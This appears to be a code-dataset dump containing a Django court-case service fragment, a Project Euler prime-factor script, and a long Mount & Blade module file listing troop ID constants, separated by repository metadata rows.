def preCargaCrear(self, idJuzgado, numero):
juzgado = juzgadoService()
E = Expediente(
juzgado=juzgado.getJuzgado(idJuzgado),
numero=numero,
actor='',
demandado='',
causa='',
autor=self.user
)
E.save()
E.subscriptores.add(self.user)
def preCargaActualizar(self, idExpediente, idJuzgado, numero):
try:
juzgado = juzgadoService()
E = Expediente.objects.get(pk=idExpediente)
E.juzgado = juzgado.getJuzgado(idJuzgado)
E.numero = numero
E.save(update_fields=[
'juzgado',
'numero'
])
except ObjectDoesNotExist:
pass
def creados(self):
return self.autor
def getExpediente(self,idExpediente):
res = ' '
for expediente in self.autor:
if (expediente.id == idExpediente):
return expediente
return res
| [
"dario.maciel.91@gmail.com"
] | dario.maciel.91@gmail.com |
e339f0c761d6c2bb7b67070fb36681d99eeb199e | 70d9bc1d92614e2bfed537dbad1c2f13f1b154bb | /p3.py | f03270ea4183594dd1335f883fe1594b4c027885 | [] | no_license | victorotazu/euler-problems | 5a6ec55ce1604a0ec905081b8b98432220f4baea | 6fdb86b584c97efc33f1d152b0bdc823c08f1233 | refs/heads/master | 2020-04-20T16:07:10.396831 | 2019-02-03T22:15:39 | 2019-02-03T22:15:39 | 168,949,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | # The prime factors of 13195 are 5, 7, 13 and 29.
# What is the largest prime factor of the number 600851475143 ?
def get_factors(number):
r = range(2,number)
seq = []
index = 0
dividend = number
while index < len(r) and int(dividend/r[index]) > 0:
if dividend % r[index] == 0:
seq.append(r[index])
dividend = int(dividend/r[index])
else:
index+=1
return seq
print(max(get_factors(600851475143)))
| [
"votazu.estrada@gmail.com"
] | votazu.estrada@gmail.com |
22900498c115119817f07e69930809a02c0285ec | a0698cf30d33e629a214850564a60dabd70f071b | /Module_system 1.166/ID_troops.py | c477bfe68e2a15fd06f8dc093c2c5e0204040e82 | [] | no_license | OmerTheGreat/Kader-Mini | 89c3feca100c827d48a36c1a5be31b62971ffbb0 | 75a8b5adde14dd72df1dc067deaa576dd3b3e4ac | refs/heads/master | 2020-12-25T06:04:57.267606 | 2016-07-11T19:26:05 | 2016-07-11T19:26:05 | 63,090,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,428 | py | trp_player = 0
trp_multiplayer_profile_troop_male = 1
trp_multiplayer_profile_troop_female = 2
trp_temp_troop = 3
trp_find_item_cheat = 4
trp_random_town_sequence = 5
trp_tournament_participants = 6
trp_tutorial_maceman = 7
trp_tutorial_archer = 8
trp_tutorial_swordsman = 9
trp_novice_fighter = 10
trp_regular_fighter = 11
trp_veteran_fighter = 12
trp_champion_fighter = 13
trp_arena_training_fighter_1 = 14
trp_arena_training_fighter_2 = 15
trp_arena_training_fighter_3 = 16
trp_arena_training_fighter_4 = 17
trp_arena_training_fighter_5 = 18
trp_arena_training_fighter_6 = 19
trp_arena_training_fighter_7 = 20
trp_arena_training_fighter_8 = 21
trp_arena_training_fighter_9 = 22
trp_arena_training_fighter_10 = 23
trp_cattle = 24
trp_farmer = 25
trp_townsman = 26
trp_watchman = 27
trp_caravan_guard = 28
trp_mercenary_swordsman = 29
trp_hired_blade = 30
trp_mercenary_crossbowman = 31
trp_mercenary_horseman = 32
trp_mercenary_cavalry = 33
trp_mercenaries_end = 34
trp_swadian_recruit = 35
trp_swadian_militia = 36
trp_swadian_footman = 37
trp_swadian_infantry = 38
trp_swadian_sergeant = 39
trp_swadian_skirmisher = 40
trp_swadian_crossbowman = 41
trp_swadian_sharpshooter = 42
trp_swadian_man_at_arms = 43
trp_swadian_knight = 44
trp_swadian_messenger = 45
trp_swadian_deserter = 46
trp_swadian_prison_guard = 47
trp_swadian_castle_guard = 48
trp_vaegir_recruit = 49
trp_vaegir_footman = 50
trp_vaegir_skirmisher = 51
trp_vaegir_archer = 52
trp_vaegir_marksman = 53
trp_vaegir_veteran = 54
trp_vaegir_infantry = 55
trp_vaegir_guard = 56
trp_vaegir_horseman = 57
trp_vaegir_knight = 58
trp_vaegir_messenger = 59
trp_vaegir_deserter = 60
trp_vaegir_prison_guard = 61
trp_vaegir_castle_guard = 62
trp_khergit_tribesman = 63
trp_khergit_skirmisher = 64
trp_khergit_horseman = 65
trp_khergit_horse_archer = 66
trp_khergit_veteran_horse_archer = 67
trp_khergit_lancer = 68
trp_khergit_messenger = 69
trp_khergit_deserter = 70
trp_khergit_prison_guard = 71
trp_khergit_castle_guard = 72
trp_nord_recruit = 73
trp_nord_footman = 74
trp_nord_trained_footman = 75
trp_nord_warrior = 76
trp_nord_veteran = 77
trp_nord_champion = 78
trp_nord_huntsman = 79
trp_nord_archer = 80
trp_nord_veteran_archer = 81
trp_nord_messenger = 82
trp_nord_deserter = 83
trp_nord_prison_guard = 84
trp_nord_castle_guard = 85
trp_rhodok_tribesman = 86
trp_rhodok_spearman = 87
trp_rhodok_trained_spearman = 88
trp_rhodok_veteran_spearman = 89
trp_rhodok_sergeant = 90
trp_rhodok_crossbowman = 91
trp_rhodok_trained_crossbowman = 92
trp_rhodok_veteran_crossbowman = 93
trp_rhodok_sharpshooter = 94
trp_rhodok_messenger = 95
trp_rhodok_deserter = 96
trp_rhodok_prison_guard = 97
trp_rhodok_castle_guard = 98
trp_sarranid_recruit = 99
trp_sarranid_footman = 100
trp_sarranid_veteran_footman = 101
trp_sarranid_infantry = 102
trp_sarranid_guard = 103
trp_sarranid_skirmisher = 104
trp_sarranid_archer = 105
trp_sarranid_master_archer = 106
trp_sarranid_horseman = 107
trp_sarranid_mamluke = 108
trp_sarranid_messenger = 109
trp_sarranid_deserter = 110
trp_sarranid_prison_guard = 111
trp_sarranid_castle_guard = 112
trp_looter = 113
trp_bandit = 114
trp_brigand = 115
trp_mountain_bandit = 116
trp_forest_bandit = 117
trp_sea_raider = 118
trp_steppe_bandit = 119
trp_taiga_bandit = 120
trp_desert_bandit = 121
trp_black_khergit_horseman = 122
trp_manhunter = 123
trp_slave_driver = 124
trp_slave_hunter = 125
trp_slave_crusher = 126
trp_slaver_chief = 127
trp_follower_woman = 128
trp_hunter_woman = 129
trp_fighter_woman = 130
trp_sword_sister = 131
trp_refugee = 132
trp_peasant_woman = 133
trp_caravan_master = 134
trp_kidnapped_girl = 135
trp_town_walker_1 = 136
trp_town_walker_2 = 137
trp_khergit_townsman = 138
trp_khergit_townswoman = 139
trp_sarranid_townsman = 140
trp_sarranid_townswoman = 141
trp_village_walker_1 = 142
trp_village_walker_2 = 143
trp_spy_walker_1 = 144
trp_spy_walker_2 = 145
trp_tournament_master = 146
trp_trainer = 147
trp_constable_hareck = 148
trp_ramun_the_slave_trader = 149
trp_guide = 150
trp_xerina = 151
trp_dranton = 152
trp_kradus = 153
trp_tutorial_trainer = 154
trp_tutorial_student_1 = 155
trp_tutorial_student_2 = 156
trp_tutorial_student_3 = 157
trp_tutorial_student_4 = 158
trp_galeas = 159
trp_farmer_from_bandit_village = 160
trp_trainer_1 = 161
trp_trainer_2 = 162
trp_trainer_3 = 163
trp_trainer_4 = 164
trp_trainer_5 = 165
trp_ransom_broker_1 = 166
trp_ransom_broker_2 = 167
trp_ransom_broker_3 = 168
trp_ransom_broker_4 = 169
trp_ransom_broker_5 = 170
trp_ransom_broker_6 = 171
trp_ransom_broker_7 = 172
trp_ransom_broker_8 = 173
trp_ransom_broker_9 = 174
trp_ransom_broker_10 = 175
trp_tavern_traveler_1 = 176
trp_tavern_traveler_2 = 177
trp_tavern_traveler_3 = 178
trp_tavern_traveler_4 = 179
trp_tavern_traveler_5 = 180
trp_tavern_traveler_6 = 181
trp_tavern_traveler_7 = 182
trp_tavern_traveler_8 = 183
trp_tavern_traveler_9 = 184
trp_tavern_traveler_10 = 185
trp_tavern_bookseller_1 = 186
trp_tavern_bookseller_2 = 187
trp_tavern_minstrel_1 = 188
trp_tavern_minstrel_2 = 189
trp_tavern_minstrel_3 = 190
trp_tavern_minstrel_4 = 191
trp_tavern_minstrel_5 = 192
trp_kingdom_heroes_including_player_begin = 193
trp_npc1 = 194
trp_npc2 = 195
trp_npc3 = 196
trp_npc4 = 197
trp_npc5 = 198
trp_npc6 = 199
trp_npc7 = 200
trp_npc8 = 201
trp_npc9 = 202
trp_npc10 = 203
trp_npc11 = 204
trp_npc12 = 205
trp_npc13 = 206
trp_npc14 = 207
trp_npc15 = 208
trp_npc16 = 209
trp_kingdom_1_lord = 210
trp_kingdom_2_lord = 211
trp_kingdom_3_lord = 212
trp_kingdom_4_lord = 213
trp_kingdom_5_lord = 214
trp_kingdom_6_lord = 215
trp_knight_1_1 = 216
trp_knight_1_2 = 217
trp_knight_1_3 = 218
trp_knight_1_4 = 219
trp_knight_1_5 = 220
trp_knight_1_6 = 221
trp_knight_1_7 = 222
trp_knight_1_8 = 223
trp_knight_1_9 = 224
trp_knight_1_10 = 225
trp_knight_1_11 = 226
trp_knight_1_12 = 227
trp_knight_1_13 = 228
trp_knight_1_14 = 229
trp_knight_1_15 = 230
trp_knight_1_16 = 231
trp_knight_1_17 = 232
trp_knight_1_18 = 233
trp_knight_1_19 = 234
trp_knight_1_20 = 235
trp_knight_2_1 = 236
trp_knight_2_2 = 237
trp_knight_2_3 = 238
trp_knight_2_4 = 239
trp_knight_2_5 = 240
trp_knight_2_6 = 241
trp_knight_2_7 = 242
trp_knight_2_8 = 243
trp_knight_2_9 = 244
trp_knight_2_10 = 245
trp_knight_2_11 = 246
trp_knight_2_12 = 247
trp_knight_2_13 = 248
trp_knight_2_14 = 249
trp_knight_2_15 = 250
trp_knight_2_16 = 251
trp_knight_2_17 = 252
trp_knight_2_18 = 253
trp_knight_2_19 = 254
trp_knight_2_20 = 255
trp_knight_3_1 = 256
trp_knight_3_2 = 257
trp_knight_3_3 = 258
trp_knight_3_4 = 259
trp_knight_3_5 = 260
trp_knight_3_6 = 261
trp_knight_3_7 = 262
trp_knight_3_8 = 263
trp_knight_3_9 = 264
trp_knight_3_10 = 265
trp_knight_3_11 = 266
trp_knight_3_12 = 267
trp_knight_3_13 = 268
trp_knight_3_14 = 269
trp_knight_3_15 = 270
trp_knight_3_16 = 271
trp_knight_3_17 = 272
trp_knight_3_18 = 273
trp_knight_3_19 = 274
trp_knight_3_20 = 275
trp_knight_4_1 = 276
trp_knight_4_2 = 277
trp_knight_4_3 = 278
trp_knight_4_4 = 279
trp_knight_4_5 = 280
trp_knight_4_6 = 281
trp_knight_4_7 = 282
trp_knight_4_8 = 283
trp_knight_4_9 = 284
trp_knight_4_10 = 285
trp_knight_4_11 = 286
trp_knight_4_12 = 287
trp_knight_4_13 = 288
trp_knight_4_14 = 289
trp_knight_4_15 = 290
trp_knight_4_16 = 291
trp_knight_4_17 = 292
trp_knight_4_18 = 293
trp_knight_4_19 = 294
trp_knight_4_20 = 295
trp_knight_5_1 = 296
trp_knight_5_2 = 297
trp_knight_5_3 = 298
trp_knight_5_4 = 299
trp_knight_5_5 = 300
trp_knight_5_6 = 301
trp_knight_5_7 = 302
trp_knight_5_8 = 303
trp_knight_5_9 = 304
trp_knight_5_10 = 305
trp_knight_5_11 = 306
trp_knight_5_12 = 307
trp_knight_5_13 = 308
trp_knight_5_14 = 309
trp_knight_5_15 = 310
trp_knight_5_16 = 311
trp_knight_5_17 = 312
trp_knight_5_18 = 313
trp_knight_5_19 = 314
trp_knight_5_20 = 315
trp_knight_6_1 = 316
trp_knight_6_2 = 317
trp_knight_6_3 = 318
trp_knight_6_4 = 319
trp_knight_6_5 = 320
trp_knight_6_6 = 321
trp_knight_6_7 = 322
trp_knight_6_8 = 323
trp_knight_6_9 = 324
trp_knight_6_10 = 325
trp_knight_6_11 = 326
trp_knight_6_12 = 327
trp_knight_6_13 = 328
trp_knight_6_14 = 329
trp_knight_6_15 = 330
trp_knight_6_16 = 331
trp_knight_6_17 = 332
trp_knight_6_18 = 333
trp_knight_6_19 = 334
trp_knight_6_20 = 335
trp_kingdom_1_pretender = 336
trp_kingdom_2_pretender = 337
trp_kingdom_3_pretender = 338
trp_kingdom_4_pretender = 339
trp_kingdom_5_pretender = 340
trp_kingdom_6_pretender = 341
trp_knight_1_1_wife = 342
trp_kingdom_1_lady_1 = 343
trp_kingdom_1_lady_2 = 344
trp_knight_1_lady_3 = 345
trp_knight_1_lady_4 = 346
trp_kingdom_l_lady_5 = 347
trp_kingdom_1_lady_6 = 348
trp_kingdom_1_lady_7 = 349
trp_kingdom_1_lady_8 = 350
trp_kingdom_1_lady_9 = 351
trp_kingdom_1_lady_10 = 352
trp_kingdom_1_lady_11 = 353
trp_kingdom_1_lady_12 = 354
trp_kingdom_l_lady_13 = 355
trp_kingdom_1_lady_14 = 356
trp_kingdom_1_lady_15 = 357
trp_kingdom_1_lady_16 = 358
trp_kingdom_1_lady_17 = 359
trp_kingdom_1_lady_18 = 360
trp_kingdom_1_lady_19 = 361
trp_kingdom_1_lady_20 = 362
trp_kingdom_2_lady_1 = 363
trp_kingdom_2_lady_2 = 364
trp_kingdom_2_lady_3 = 365
trp_kingdom_2_lady_4 = 366
trp_kingdom_2_lady_5 = 367
trp_kingdom_2_lady_6 = 368
trp_kingdom_2_lady_7 = 369
trp_kingdom_2_lady_8 = 370
trp_kingdom_2_lady_9 = 371
trp_kingdom_2_lady_10 = 372
trp_kingdom_2_lady_11 = 373
trp_kingdom_2_lady_12 = 374
trp_kingdom_2_lady_13 = 375
trp_kingdom_2_lady_14 = 376
trp_kingdom_2_lady_15 = 377
trp_kingdom_2_lady_16 = 378
trp_kingdom_2_lady_17 = 379
trp_kingdom_2_lady_18 = 380
trp_kingdom_2_lady_19 = 381
trp_kingdom_2_lady_20 = 382
trp_kingdom_3_lady_1 = 383
trp_kingdom_3_lady_2 = 384
trp_kingdom_3_lady_3 = 385
trp_kingdom_3_lady_4 = 386
trp_kingdom_3_lady_5 = 387
trp_kingdom_3_lady_6 = 388
trp_kingdom_3_lady_7 = 389
trp_kingdom_3_lady_8 = 390
trp_kingdom_3_lady_9 = 391
trp_kingdom_3_lady_10 = 392
trp_kingdom_3_lady_11 = 393
trp_kingdom_3_lady_12 = 394
trp_kingdom_3_lady_13 = 395
trp_kingdom_3_lady_14 = 396
trp_kingdom_3_lady_15 = 397
trp_kingdom_3_lady_16 = 398
trp_kingdom_3_lady_17 = 399
trp_kingdom_3_lady_18 = 400
trp_kingdom_3_lady_19 = 401
trp_kingdom_3_lady_20 = 402
trp_kingdom_4_lady_1 = 403
trp_kingdom_4_lady_2 = 404
trp_kingdom_4_lady_3 = 405
trp_kingdom_4_lady_4 = 406
trp_kingdom_4_lady_5 = 407
trp_kingdom_4_lady_6 = 408
trp_kingdom_4_lady_7 = 409
trp_knight_4_2b_daughter_1 = 410
trp_kingdom_4_lady_9 = 411
trp_knight_4_2c_wife_1 = 412
trp_kingdom_4_lady_11 = 413
trp_knight_4_2c_daughter = 414
trp_knight_4_1b_wife = 415
trp_kingdom_4_lady_14 = 416
trp_knight_4_1b_daughter = 417
trp_knight_4_2b_daughter_2 = 418
trp_kingdom_4_lady_17 = 419
trp_knight_4_2c_wife_2 = 420
trp_knight_4_1c_daughter = 421
trp_kingdom_4_lady_20 = 422
trp_kingdom_5_lady_1 = 423
trp_kingdom_5_lady_2 = 424
trp_kingdom_5_lady_3 = 425
trp_kingdom_5_lady_4 = 426
trp_kingdom_5_5_wife = 427
trp_kingdom_5_2b_wife_1 = 428
trp_kingdom_5_1c_daughter_1 = 429
trp_kingdom_5_2c_daughter_1 = 430
trp_kingdom_5_1c_wife_1 = 431
trp_kingdom_5_2c_wife_1 = 432
trp_kingdom_5_1c_daughter_2 = 433
trp_kingdom_5_2c_daughter_2 = 434
trp_kingdom_5_1b_wife = 435
trp_kingdom_5_2b_wife_2 = 436
trp_kingdom_5_1c_daughter_3 = 437
trp_kingdom_5_lady_16 = 438
trp_kingdom_5_1c_wife_2 = 439
trp_kingdom_5_2c_wife_2 = 440
trp_kingdom_5_1c_daughter_4 = 441
trp_kingdom_5_lady_20 = 442
trp_kingdom_6_lady_1 = 443
trp_kingdom_6_lady_2 = 444
trp_kingdom_6_lady_3 = 445
trp_kingdom_6_lady_4 = 446
trp_kingdom_6_lady_5 = 447
trp_kingdom_6_lady_6 = 448
trp_kingdom_6_lady_7 = 449
trp_kingdom_6_lady_8 = 450
trp_kingdom_6_lady_9 = 451
trp_kingdom_6_lady_10 = 452
trp_kingdom_6_lady_11 = 453
trp_kingdom_6_lady_12 = 454
trp_kingdom_6_lady_13 = 455
trp_kingdom_6_lady_14 = 456
trp_kingdom_6_lady_15 = 457
trp_kingdom_6_lady_16 = 458
trp_kingdom_6_lady_17 = 459
trp_kingdom_6_lady_18 = 460
trp_kingdom_6_lady_19 = 461
trp_kingdom_6_lady_20 = 462
trp_heroes_end = 463
trp_town_1_seneschal = 464
trp_town_2_seneschal = 465
trp_town_3_seneschal = 466
trp_town_4_seneschal = 467
trp_town_5_seneschal = 468
trp_town_6_seneschal = 469
trp_town_7_seneschal = 470
trp_town_8_seneschal = 471
trp_town_9_seneschal = 472
trp_town_10_seneschal = 473
trp_town_11_seneschal = 474
trp_town_12_seneschal = 475
trp_town_13_seneschal = 476
trp_town_14_seneschal = 477
trp_town_15_seneschal = 478
trp_town_16_seneschal = 479
trp_town_17_seneschal = 480
trp_town_18_seneschal = 481
trp_town_19_seneschal = 482
trp_town_20_seneschal = 483
trp_town_21_seneschal = 484
trp_town_22_seneschal = 485
trp_castle_1_seneschal = 486
trp_castle_2_seneschal = 487
trp_castle_3_seneschal = 488
trp_castle_4_seneschal = 489
trp_castle_5_seneschal = 490
trp_castle_6_seneschal = 491
trp_castle_7_seneschal = 492
trp_castle_8_seneschal = 493
trp_castle_9_seneschal = 494
trp_castle_10_seneschal = 495
trp_castle_11_seneschal = 496
trp_castle_12_seneschal = 497
trp_castle_13_seneschal = 498
trp_castle_14_seneschal = 499
trp_castle_15_seneschal = 500
trp_castle_16_seneschal = 501
trp_castle_17_seneschal = 502
trp_castle_18_seneschal = 503
trp_castle_19_seneschal = 504
trp_castle_20_seneschal = 505
trp_castle_21_seneschal = 506
trp_castle_22_seneschal = 507
trp_castle_23_seneschal = 508
trp_castle_24_seneschal = 509
trp_castle_25_seneschal = 510
trp_castle_26_seneschal = 511
trp_castle_27_seneschal = 512
trp_castle_28_seneschal = 513
trp_castle_29_seneschal = 514
trp_castle_30_seneschal = 515
trp_castle_31_seneschal = 516
trp_castle_32_seneschal = 517
trp_castle_33_seneschal = 518
trp_castle_34_seneschal = 519
trp_castle_35_seneschal = 520
trp_castle_36_seneschal = 521
trp_castle_37_seneschal = 522
trp_castle_38_seneschal = 523
trp_castle_39_seneschal = 524
trp_castle_40_seneschal = 525
trp_castle_41_seneschal = 526
trp_castle_42_seneschal = 527
trp_castle_43_seneschal = 528
trp_castle_44_seneschal = 529
trp_castle_45_seneschal = 530
trp_castle_46_seneschal = 531
trp_castle_47_seneschal = 532
trp_castle_48_seneschal = 533
trp_town_1_arena_master = 534
trp_town_2_arena_master = 535
trp_town_3_arena_master = 536
trp_town_4_arena_master = 537
trp_town_5_arena_master = 538
trp_town_6_arena_master = 539
trp_town_7_arena_master = 540
trp_town_8_arena_master = 541
trp_town_9_arena_master = 542
trp_town_10_arena_master = 543
trp_town_11_arena_master = 544
trp_town_12_arena_master = 545
trp_town_13_arena_master = 546
trp_town_14_arena_master = 547
trp_town_15_arena_master = 548
trp_town_16_arena_master = 549
trp_town_17_arena_master = 550
trp_town_18_arena_master = 551
trp_town_19_arena_master = 552
trp_town_20_arena_master = 553
trp_town_21_arena_master = 554
trp_town_22_arena_master = 555
trp_town_1_armorer = 556
trp_town_2_armorer = 557
trp_town_3_armorer = 558
trp_town_4_armorer = 559
trp_town_5_armorer = 560
trp_town_6_armorer = 561
trp_town_7_armorer = 562
trp_town_8_armorer = 563
trp_town_9_armorer = 564
trp_town_10_armorer = 565
trp_town_11_armorer = 566
trp_town_12_armorer = 567
trp_town_13_armorer = 568
trp_town_14_armorer = 569
trp_town_15_armorer = 570
trp_town_16_armorer = 571
trp_town_17_armorer = 572
trp_town_18_armorer = 573
trp_town_19_armorer = 574
trp_town_20_armorer = 575
trp_town_21_armorer = 576
trp_town_22_armorer = 577
trp_town_1_weaponsmith = 578
trp_town_2_weaponsmith = 579
trp_town_3_weaponsmith = 580
trp_town_4_weaponsmith = 581
trp_town_5_weaponsmith = 582
trp_town_6_weaponsmith = 583
trp_town_7_weaponsmith = 584
trp_town_8_weaponsmith = 585
trp_town_9_weaponsmith = 586
trp_town_10_weaponsmith = 587
trp_town_11_weaponsmith = 588
trp_town_12_weaponsmith = 589
trp_town_13_weaponsmith = 590
trp_town_14_weaponsmith = 591
trp_town_15_weaponsmith = 592
trp_town_16_weaponsmith = 593
trp_town_17_weaponsmith = 594
trp_town_18_weaponsmith = 595
trp_town_19_weaponsmith = 596
trp_town_20_weaponsmith = 597
trp_town_21_weaponsmith = 598
trp_town_22_weaponsmith = 599
trp_town_1_tavernkeeper = 600
trp_town_2_tavernkeeper = 601
trp_town_3_tavernkeeper = 602
trp_town_4_tavernkeeper = 603
trp_town_5_tavernkeeper = 604
trp_town_6_tavernkeeper = 605
trp_town_7_tavernkeeper = 606
trp_town_8_tavernkeeper = 607
trp_town_9_tavernkeeper = 608
trp_town_10_tavernkeeper = 609
trp_town_11_tavernkeeper = 610
trp_town_12_tavernkeeper = 611
trp_town_13_tavernkeeper = 612
trp_town_14_tavernkeeper = 613
trp_town_15_tavernkeeper = 614
trp_town_16_tavernkeeper = 615
trp_town_17_tavernkeeper = 616
trp_town_18_tavernkeeper = 617
trp_town_19_tavernkeeper = 618
trp_town_20_tavernkeeper = 619
trp_town_21_tavernkeeper = 620
trp_town_22_tavernkeeper = 621
trp_town_1_merchant = 622
trp_town_2_merchant = 623
trp_town_3_merchant = 624
trp_town_4_merchant = 625
trp_town_5_merchant = 626
trp_town_6_merchant = 627
trp_town_7_merchant = 628
trp_town_8_merchant = 629
trp_town_9_merchant = 630
trp_town_10_merchant = 631
trp_town_11_merchant = 632
trp_town_12_merchant = 633
trp_town_13_merchant = 634
trp_town_14_merchant = 635
trp_town_15_merchant = 636
trp_town_16_merchant = 637
trp_town_17_merchant = 638
trp_town_18_merchant = 639
trp_town_19_merchant = 640
trp_town_20_merchant = 641
trp_town_21_merchant = 642
trp_town_22_merchant = 643
trp_salt_mine_merchant = 644
trp_town_1_horse_merchant = 645
trp_town_2_horse_merchant = 646
trp_town_3_horse_merchant = 647
trp_town_4_horse_merchant = 648
trp_town_5_horse_merchant = 649
trp_town_6_horse_merchant = 650
trp_town_7_horse_merchant = 651
trp_town_8_horse_merchant = 652
trp_town_9_horse_merchant = 653
trp_town_10_horse_merchant = 654
trp_town_11_horse_merchant = 655
trp_town_12_horse_merchant = 656
trp_town_13_horse_merchant = 657
trp_town_14_horse_merchant = 658
trp_town_15_horse_merchant = 659
trp_town_16_horse_merchant = 660
trp_town_17_horse_merchant = 661
trp_town_18_horse_merchant = 662
trp_town_19_horse_merchant = 663
trp_town_20_horse_merchant = 664
trp_town_21_horse_merchant = 665
trp_town_22_horse_merchant = 666
trp_town_1_mayor = 667
trp_town_2_mayor = 668
trp_town_3_mayor = 669
trp_town_4_mayor = 670
trp_town_5_mayor = 671
trp_town_6_mayor = 672
trp_town_7_mayor = 673
trp_town_8_mayor = 674
trp_town_9_mayor = 675
trp_town_10_mayor = 676
trp_town_11_mayor = 677
trp_town_12_mayor = 678
trp_town_13_mayor = 679
trp_town_14_mayor = 680
trp_town_15_mayor = 681
trp_town_16_mayor = 682
trp_town_17_mayor = 683
trp_town_18_mayor = 684
trp_town_19_mayor = 685
trp_town_20_mayor = 686
trp_town_21_mayor = 687
trp_town_22_mayor = 688
trp_village_1_elder = 689
trp_village_2_elder = 690
trp_village_3_elder = 691
trp_village_4_elder = 692
trp_village_5_elder = 693
trp_village_6_elder = 694
trp_village_7_elder = 695
trp_village_8_elder = 696
trp_village_9_elder = 697
trp_village_10_elder = 698
trp_village_11_elder = 699
trp_village_12_elder = 700
trp_village_13_elder = 701
trp_village_14_elder = 702
trp_village_15_elder = 703
trp_village_16_elder = 704
trp_village_17_elder = 705
trp_village_18_elder = 706
trp_village_19_elder = 707
trp_village_20_elder = 708
trp_village_21_elder = 709
trp_village_22_elder = 710
trp_village_23_elder = 711
trp_village_24_elder = 712
trp_village_25_elder = 713
trp_village_26_elder = 714
trp_village_27_elder = 715
trp_village_28_elder = 716
trp_village_29_elder = 717
trp_village_30_elder = 718
trp_village_31_elder = 719
trp_village_32_elder = 720
trp_village_33_elder = 721
trp_village_34_elder = 722
trp_village_35_elder = 723
trp_village_36_elder = 724
trp_village_37_elder = 725
trp_village_38_elder = 726
trp_village_39_elder = 727
trp_village_40_elder = 728
trp_village_41_elder = 729
trp_village_42_elder = 730
trp_village_43_elder = 731
trp_village_44_elder = 732
trp_village_45_elder = 733
trp_village_46_elder = 734
trp_village_47_elder = 735
trp_village_48_elder = 736
trp_village_49_elder = 737
trp_village_50_elder = 738
trp_village_51_elder = 739
trp_village_52_elder = 740
trp_village_53_elder = 741
trp_village_54_elder = 742
trp_village_55_elder = 743
trp_village_56_elder = 744
trp_village_57_elder = 745
trp_village_58_elder = 746
trp_village_59_elder = 747
trp_village_60_elder = 748
trp_village_61_elder = 749
trp_village_62_elder = 750
trp_village_63_elder = 751
trp_village_64_elder = 752
trp_village_65_elder = 753
trp_village_66_elder = 754
trp_village_67_elder = 755
trp_village_68_elder = 756
trp_village_69_elder = 757
trp_village_70_elder = 758
trp_village_71_elder = 759
trp_village_72_elder = 760
trp_village_73_elder = 761
trp_village_74_elder = 762
trp_village_75_elder = 763
trp_village_76_elder = 764
trp_village_77_elder = 765
trp_village_78_elder = 766
trp_village_79_elder = 767
trp_village_80_elder = 768
trp_village_81_elder = 769
trp_village_82_elder = 770
trp_village_83_elder = 771
trp_village_84_elder = 772
trp_village_85_elder = 773
trp_village_86_elder = 774
trp_village_87_elder = 775
trp_village_88_elder = 776
trp_village_89_elder = 777
trp_village_90_elder = 778
trp_village_91_elder = 779
trp_village_92_elder = 780
trp_village_93_elder = 781
trp_village_94_elder = 782
trp_village_95_elder = 783
trp_village_96_elder = 784
trp_village_97_elder = 785
trp_village_98_elder = 786
trp_village_99_elder = 787
trp_village_100_elder = 788
trp_village_101_elder = 789
trp_village_102_elder = 790
trp_village_103_elder = 791
trp_village_104_elder = 792
trp_village_105_elder = 793
trp_village_106_elder = 794
trp_village_107_elder = 795
trp_village_108_elder = 796
trp_village_109_elder = 797
trp_village_110_elder = 798
trp_merchants_end = 799
trp_town_1_master_craftsman = 800
trp_town_2_master_craftsman = 801
trp_town_3_master_craftsman = 802
trp_town_4_master_craftsman = 803
trp_town_5_master_craftsman = 804
trp_town_6_master_craftsman = 805
trp_town_7_master_craftsman = 806
trp_town_8_master_craftsman = 807
trp_town_9_master_craftsman = 808
trp_town_10_master_craftsman = 809
trp_town_11_master_craftsman = 810
trp_town_12_master_craftsman = 811
trp_town_13_master_craftsman = 812
trp_town_14_master_craftsman = 813
trp_town_15_master_craftsman = 814
trp_town_16_master_craftsman = 815
trp_town_17_master_craftsman = 816
trp_town_18_master_craftsman = 817
trp_town_19_master_craftsman = 818
trp_town_20_master_craftsman = 819
trp_town_21_master_craftsman = 820
trp_town_22_master_craftsman = 821
trp_zendar_chest = 822
trp_tutorial_chest_1 = 823
trp_tutorial_chest_2 = 824
trp_bonus_chest_1 = 825
trp_bonus_chest_2 = 826
trp_bonus_chest_3 = 827
trp_household_possessions = 828
trp_temp_array_a = 829
trp_temp_array_b = 830
trp_temp_array_c = 831
trp_stack_selection_amounts = 832
trp_stack_selection_ids = 833
trp_notification_menu_types = 834
trp_notification_menu_var1 = 835
trp_notification_menu_var2 = 836
trp_banner_background_color_array = 837
trp_multiplayer_data = 838
trp_local_merchant = 839
trp_tax_rebel = 840
trp_trainee_peasant = 841
trp_fugitive = 842
trp_belligerent_drunk = 843
trp_hired_assassin = 844
trp_fight_promoter = 845
trp_spy = 846
trp_spy_partner = 847
trp_nurse_for_lady = 848
trp_temporary_minister = 849
trp_quick_battle_6_player = 850
trp_swadian_crossbowman_multiplayer_ai = 851
trp_swadian_infantry_multiplayer_ai = 852
trp_swadian_man_at_arms_multiplayer_ai = 853
trp_vaegir_archer_multiplayer_ai = 854
trp_vaegir_spearman_multiplayer_ai = 855
trp_vaegir_horseman_multiplayer_ai = 856
trp_khergit_dismounted_lancer_multiplayer_ai = 857
trp_khergit_veteran_horse_archer_multiplayer_ai = 858
trp_khergit_lancer_multiplayer_ai = 859
trp_nord_veteran_multiplayer_ai = 860
trp_nord_scout_multiplayer_ai = 861
trp_nord_archer_multiplayer_ai = 862
trp_rhodok_veteran_crossbowman_multiplayer_ai = 863
trp_rhodok_veteran_spearman_multiplayer_ai = 864
trp_rhodok_scout_multiplayer_ai = 865
trp_sarranid_infantry_multiplayer_ai = 866
trp_sarranid_archer_multiplayer_ai = 867
trp_sarranid_horseman_multiplayer_ai = 868
trp_swadian_crossbowman_multiplayer = 869
trp_swadian_infantry_multiplayer = 870
trp_swadian_man_at_arms_multiplayer = 871
trp_vaegir_archer_multiplayer = 872
trp_vaegir_spearman_multiplayer = 873
trp_vaegir_horseman_multiplayer = 874
trp_khergit_veteran_horse_archer_multiplayer = 875
trp_khergit_infantry_multiplayer = 876
trp_khergit_lancer_multiplayer = 877
trp_nord_archer_multiplayer = 878
trp_nord_veteran_multiplayer = 879
trp_nord_scout_multiplayer = 880
trp_rhodok_veteran_crossbowman_multiplayer = 881
trp_rhodok_sergeant_multiplayer = 882
trp_rhodok_horseman_multiplayer = 883
trp_sarranid_archer_multiplayer = 884
trp_sarranid_footman_multiplayer = 885
trp_sarranid_mamluke_multiplayer = 886
trp_multiplayer_end = 887
